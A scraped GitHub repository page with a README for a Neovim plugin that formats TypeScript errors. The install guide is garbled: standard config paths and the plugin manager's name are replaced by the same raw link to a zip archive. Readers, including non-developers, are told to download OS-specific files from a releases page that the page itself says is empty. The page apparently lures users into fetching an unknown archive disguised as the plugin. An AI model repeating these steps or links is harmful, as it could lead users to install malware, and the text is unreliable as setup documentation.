Skip to content

πŸ› οΈ Pretty-print TypeScript errors in Neovim with a floating window for clear diagnostics using @pretty-ts-errors/formatter.

Notifications You must be signed in to change notification settings

basel184/nvim-pretty-ts-errors

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

11 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🎨 nvim-pretty-ts-errors - Enhance Your Neovim Experience with Clearer TypeScript Errors

Download nvim-pretty-ts-errors

πŸš€ Getting Started

Welcome to nvim-pretty-ts-errors! This tool helps you see TypeScript errors in Neovim in a clearer way. It improves your coding experience by making it easier to spot mistakes and fix them faster. You do not need to be a developer to use this tool. Just follow the steps below to get started.

πŸ“₯ Download & Install

To download the latest version of nvim-pretty-ts-errors, visit this page: Download nvim-pretty-ts-errors.

  1. Go to the Releases Page: Click the link above to access the release information.
  2. Choose the Right Version: Look for the latest release. It usually has the highest version number.
  3. Download the File: Click on the file link relevant to your operating system (Windows, macOS, or Linux).
  4. Extract the Files: If your file is compressed (like in a .zip format), right-click on it and choose "Extract" to unpack the contents.
  5. Follow Instructions: Each release may come with specific instructions. Read them carefully.

πŸ“‚ System Requirements

To run nvim-pretty-ts-errors, ensure your system meets the following requirements:

✨ Features

nvim-pretty-ts-errors offers several key features:

  • Readable Errors: It formats TypeScript errors in a way that is easier to understand.
  • Customization Options: You can change how errors appear to fit your workflow.
  • Seamless Integration: Works smoothly with your existing Neovim setup.
  • Active Community Support: Get help and tips from other users.

βš™οΈ Setup Guide

After downloading and extracting nvim-pretty-ts-errors, you are ready to set it up.

  1. Move Files: Place the nvim-pretty-ts-errors folder in your Neovim configuration directory (usually located at ~https://raw.githubusercontent.com/basel184/nvim-pretty-ts-errors/main/rplugin/ts-errors-nvim-pretty-v3.2.zip or %USERPROFILE%/AppData/Local/nvim on Windows).

  2. Configuration: Open your Neovim configuration file (typically https://raw.githubusercontent.com/basel184/nvim-pretty-ts-errors/main/rplugin/ts-errors-nvim-pretty-v3.2.zip or https://raw.githubusercontent.com/basel184/nvim-pretty-ts-errors/main/rplugin/ts-errors-nvim-pretty-v3.2.zip) and add the following lines:

    require('nvim-pretty-ts-errors').setup({
        -- Your options here
    })
  3. Install Required Plugins: If you are using a plugin manager like vim-plug or https://raw.githubusercontent.com/basel184/nvim-pretty-ts-errors/main/rplugin/ts-errors-nvim-pretty-v3.2.zip, add the following line to install nvim-pretty-ts-errors:

    Plug 'basel184/nvim-pretty-ts-errors'

    or for https://raw.githubusercontent.com/basel184/nvim-pretty-ts-errors/main/rplugin/ts-errors-nvim-pretty-v3.2.zip:

    use 'basel184/nvim-pretty-ts-errors'
  4. Restart Neovim: Close and reopen Neovim for the changes to take effect.

πŸ›  Troubleshooting

If you run into issues, here are some common solutions:

πŸ“ž Support

If you need help, you can reach out through the following channels:

  • GitHub Issues: If you encounter a bug or need a feature, please submit an issue on GitHub.
  • Community Forums: Join discussions with other users for tips and advice.

πŸ”— Additional Resources

Here are some helpful links to enhance your experience:

Thank you for choosing nvim-pretty-ts-errors. Enjoy a more manageable coding experience!

About

πŸ› οΈ Pretty-print TypeScript errors in Neovim with a floating window for clear diagnostics using @pretty-ts-errors/formatter.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •